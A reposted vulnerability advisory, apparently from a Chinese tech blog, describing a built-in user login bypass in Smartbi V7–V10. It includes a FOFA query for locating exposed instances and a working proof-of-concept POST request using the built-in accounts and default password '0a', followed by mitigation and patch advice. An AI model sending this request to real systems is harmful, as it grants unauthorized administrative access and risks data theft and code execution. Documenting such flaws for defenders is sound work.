Smartbi Built-in User Login Bypass Vulnerability

News 2023-08-11 21:45:01 views: null

Smartbi Built-in User Login Bypass Vulnerability

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Product Introduction

​ Smartbi big data analysis product integrates all stages of BI definition, docks with various business databases, data warehouses and big data analysis platforms for processing, analysis and mining, and visual display; it meets the various data analysis application needs of all users, such as large Data analysis, visual analysis, exploratory analysis, complex reports, application sharing, etc.

2. Vulnerability overview

​ Smartbi will have several built-in users during installation. When using a specific interface, it can bypass the user identity authentication mechanism to obtain its identity credentials, and then use the obtained identity credentials to call the background interface, which may lead to sensitive information leakage and code execution.

3. Scope of influence

​ V7 <= Smartbi <= V10

4. Reproduction environment

FOFA:app="SMARTBI"

insert image description here

5. Vulnerability recurrence

Verify that the vulnerability exists

http://your-ip/smartbi/vision/RMIServlet

insert image description here
PoC:

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

className=UserService&methodName=loginFromDB&params=["system","0a"]

The three parameters passed in the request body

className: UserService class name must be specified methodName: method called by this class loginFromDB

params: The first parameter is the built-in three user names (public, service, system) that can be randomly constructed, and the second parameter is the default ciphertext password of the three accounts (the default value is 0a)

Send a post request to bypass login

insert image description here

After sending the request, refresh the page to log in to the background

6. Repair suggestions

interim mitigation plan

Under the premise of confirming that the business will not be affected, delete several built-in accounts (public, service, system). At the same time, if it is not necessary, do not open the Smartbi system on the Internet.

upgrade fix

The official upgrade patch package has been released, which supports online upgrade and offline patch installation

Guess you like

Origin blog.csdn.net/holyxp/article/details/131911274
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com